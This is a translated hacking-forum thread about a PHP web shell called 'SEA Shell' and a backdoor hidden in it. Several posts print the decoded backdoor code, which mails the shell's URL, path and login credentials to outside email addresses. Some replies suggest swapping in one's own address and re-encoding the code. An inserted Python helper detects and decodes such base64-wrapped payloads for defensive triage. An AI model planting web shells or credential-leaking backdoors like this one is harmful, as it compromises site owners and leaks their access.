MadAgent, posted August 19, 2014

Login bypass exploit -> you can execute commands by sending parameters via POST or GET.

Example: SyRiAn Electronic Army Shell :: SEA Shell

Bypass: SyRiAn Electronic Army Shell :: SEA Shell

You also get to see the command panel, so you no longer have to fumble around like Dorel with GET and POST...
Nytro, posted August 19, 2014

Backdoor:

<?php eval(base64_decode('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')); ?>

That is:

$site = "www.dev-pts.com/vb";
// Runs on every host whose name does not match the author's own site
if (!ereg($site, $_SERVER['SERVER_NAME'])) {
    $to = "sattia34@gmail.com";
    $subject = "New Shell Uploaded";
    $header = "from: New Shell <saha21@dev-pts.com>";
    // Mails the shell's URL, file path and login to the backdoor's author
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $message .= " User : " . $user;
    $message .= " Pass : " . $pass;
    $sentmail = mail($to, $subject, $message, $header);
    echo "";
    exit;
}
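Added example (not part of the thread or of the shell's code): a small Python triage helper that finds `eval(base64_decode('...'))` wrappers like the one above in PHP source, decodes them, and reports the phone-home traits seen in the decoded payload. The sample payload and the address `collector@example.invalid` are constructed placeholders, and the names `audit_php`, `INDICATORS` and `SAMPLE` are this example's own.

```python
import base64
import binascii
import re

# eval(base64_decode('...')) with optional whitespace and either quote style.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)
# Traits of the phone-home payload quoted in the thread.
INDICATORS = {
    "sends_mail": re.compile(r"@?\bmail\s*\(", re.IGNORECASE),
    "reads_server_vars": re.compile(r"\$_SERVER\s*\["),
    "leaks_credentials": re.compile(r"\$(?:user|pass)\b", re.IGNORECASE),
}
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def audit_php(source):
    """Decode every eval(base64_decode(...)) blob and describe what it hides."""
    findings = []
    for match in EVAL_B64.finditer(source):
        try:
            decoded = base64.b64decode(match.group(2), validate=False)
        except (binascii.Error, ValueError):
            findings.append({"offset": match.start(), "error": "undecodable blob"})
            continue
        text = decoded.decode("utf-8", errors="replace")
        findings.append({
            "offset": match.start(),
            "decoded": text,
            "flags": sorted(k for k, rx in INDICATORS.items() if rx.search(text)),
            "addresses": sorted(set(EMAIL.findall(text))),
        })
    return findings


# Constructed sample: a stand-in payload with the same shape as the decoded
# code in the thread, using a placeholder address (assumption, not page data).
_PAYLOAD = (
    '$to = "collector@example.invalid";'
    '$message = "Link : http://" . $_SERVER[\'SERVER_NAME\'];'
    '$message .= " User : " . $user . " Pass : " . $pass;'
    '@mail($to, "New Shell Uploaded", $message);'
)
SAMPLE = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(_PAYLOAD.encode()).decode()

if __name__ == "__main__":
    print(audit_php(SAMPLE))
```

Any file that produces a finding with `sends_mail` set should be treated as reporting to a third party, whatever else the file does.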
CocolinoRST, posted August 19, 2014 (edited September 24, 2014 by CocolinoRST)

I found it on the net; I had no idea it had a backdoor, and I wasn't really curious enough to inspect it..
dancezar (Active Members), posted August 19, 2014

Well, I found it on the net and thought I'd share it with the RST users; I really didn't see that it was a backdoor or anything.. What is a backdoor, can someone explain it to me too? Could it be some kind of virus, I mean did I catch that virus? Or is a backdoor a virus with which you find out the data of a particular site?

If you put a shell on a site, the developer of the shell, or some random guy, also has access to that shell.
CocolinoRST, posted August 19, 2014 (edited September 24, 2014 by CocolinoRST)

Thanks for the answer.
nonimporta, posted August 19, 2014

You were not infected with anything, but the site you uploaded the shell to is compromised twice: once by you and once more by whoever planted that backdoor. It is a common practice with various hacking programs, scanners etc. for the person who makes them to make sure they profit as much as possible from them.
Scorpionadi, posted August 21, 2014

Out of curiosity, can't this shell be modified so that it is no longer backdoored? From what I understood it is a fairly good shell, and I think those who know PHP can make some modifications.
quadxenon, posted August 21, 2014

Wouldn't it be enough to delete the part of the code that Nytro showed?
dr.d3v1l, posted August 22, 2014

You take the code and base64-decode it:

$site = "www.dev-pts.com/vb";
if (!ereg($site, $_SERVER['SERVER_NAME'])) {
    $to = "masteritaliano@outlook.it";
    $subject = "New Shell Uploaded";
    $header = "from: New Shell <saha21@dev-pts.com>";
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $message .= " User : " . $user;
    $message .= " Pass : " . $pass;
    $sentmail = @mail($to, $subject, $message, $header);
    echo "";
    exit;
}

Then you base64-encode it and put it back in there.
quadxenon, posted August 22, 2014

> You take the code and base64-decode it:
>
> $site = "www.dev-pts.com/vb";
> if (!ereg($site, $_SERVER['SERVER_NAME'])) {
>     $to = "masteritaliano@outlook.it";
>     $subject = "New Shell Uploaded";
>     $header = "from: New Shell <saha21@dev-pts.com>";
>     $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
>     $message .= "Path : " . __file__;
>     $message .= " User : " . $user;
>     $message .= " Pass : " . $pass;
>     $sentmail = @mail($to, $subject, $message, $header);
>     echo "";
>     exit;
> }
>
> Then you base64-encode it and put it back in there.

Don't forget to first put sugi.pula@lammere.com in place of masteritaliano@outlook.it and only then encode it in base64.
CocolinoRST, posted August 22, 2014

You simply delete the part of the code that Nytro said is the backdoor. What could be simpler than that?
Sphere, posted August 25, 2014

Two days ago you didn't know what a backdoor was and were asking whether the PHP shell had infected you, and now you even know how to remove it. Aren't you dubious?

P.S. DUBIOUS adj. 1. see unsure. 2. see suspect. 3. equivocal, doubtful, shady, suspect
CocolinoRST, posted September 24, 2014

As you say, maybe I read up on it along the way.. But since, as you say, I'm so dubious, if you do a search on Google you'll see that I'm also wanted by N.A.S.A.. Bro, bad jokes like the ones you make have no place here, understand? A person isn't allowed to ask a question anymore without some guy jumping in and mouthing off. And relax, I told him what Nytro said, so what was so hard about reading what Nytro said and saying it here?